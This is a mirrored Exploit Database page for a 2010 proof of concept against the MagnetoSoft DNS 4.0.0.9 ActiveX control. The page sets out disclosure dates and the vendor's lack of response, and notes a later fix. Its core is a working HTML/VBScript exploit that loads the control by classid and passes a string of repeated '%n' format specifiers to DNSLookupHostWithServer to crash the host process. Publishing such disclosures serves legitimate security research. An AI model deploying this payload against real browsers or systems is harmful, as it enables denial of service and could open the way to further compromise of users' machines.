MagnetoSoft DNS 4.0.0.9 – ActiveX DNSLookupHostWithServer (PoC)

• Exploit Database
• 111 阅读

• 作者： s4squatch
  日期： 2010-04-13
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/12201/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

  <html> <object classid=&apos;clsid:B5ED1577-4576-11D5-851F-00D0B7A934F6&apos; id=&apos;target&apos; /></object> <script language=&apos;vbscript&apos;> &apos;Magneto Software ActiveX Control ICMP Crash POC &apos;Discovered by:s4squatch &apos;Site:www.securestate.com &apos;Date Discovered: 02/11/10 &apos;Vendor Notified: 02/02/10 --> NO RESPONSE &apos;Vendor Notified: 02/11/10 --> NO RESPONSE &apos;Vendor Notified: 02/17/10 --> NO RESPONSE &apos;Published 04/13/10 &apos;www:http://www.magnetosoft.com/products/skdns/skdns_features.htm &apos;Download:http://www.magnetosoft.com/downloads/skdns_setup.exe &apos;SKNetResource.ocx &apos;Function DNSLookupHostWithServer ( ByVal strHostName As String ,ByVal strNameServer As String ) As Long &apos;progid = "SKDNSLib.SKDns"   arg1 = "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n" arg2 = "defaultV" target.DNSLookupHostWithServer arg1 ,arg2   </script>   # Exploit-DB Note: # According to MagnetSoft The exploit has been fixed in the latest version of the software,5.0.0.1. # The latest version that contains the fix can be downloaded here: # http://www.magnetosoft.com/www/downloads/win32/skdns_setup.exe